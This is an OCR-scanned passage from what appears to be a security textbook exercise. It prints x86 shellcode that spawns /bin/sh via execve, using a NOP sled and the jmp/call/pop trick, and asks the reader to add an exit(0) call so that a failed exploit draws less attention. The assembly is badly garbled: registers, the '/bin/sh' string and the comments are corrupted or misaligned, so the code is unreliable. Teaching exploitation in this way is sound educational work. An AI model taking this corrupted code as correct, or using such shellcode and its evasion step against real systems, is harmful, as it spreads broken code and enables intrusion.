The example shellcode shown in Figure assumes that the execve system call will not return (which is the case as long as it is successful). However, to cover the possibility that it might fail, the code could be extended to include another system call after it, this time to exit(0). This would cause the program to exit normally, attracting less attention than allowing it to crash. Extend this shellcode with the extra assembler instructions needed to marshal arguments and call this system function Equivalent position-independent x86 assembly code nop nop jmp find /lend of nop sled //jump to end of code //pop address of sh off stack into %esi //zero contento of EAX cont: pop %esi mov %a1, 0x7 (tesi) //copy zero byte to end of string sh (tesi) lea (tesi), tebx //load address of sh (Resi) into tebx mov tebx, 0x8 (tesi) //save address of sh in args toj (Resi+8) mov teax, Oxc(tei) I/copy zero to arga [1] (teai+c) mov $0xb, tal mov tesi, tebx lea 0x8 (Resi),secx //copy address of args (tesit8) to tecx lea 0xc (teai),tedx //copy addreso of arga [1 (teoita) to tedx int $0x80 //copy execve syscall number (11) to AL //copy address of sh (Resi) into teb:x //software interrupt to execute syscall //call cont which saves next address on stack find: call cont sh: string"/bin/ah"//string constant argo: .long 0 //apace used for arga array //args [1) and also NULL for env array long 0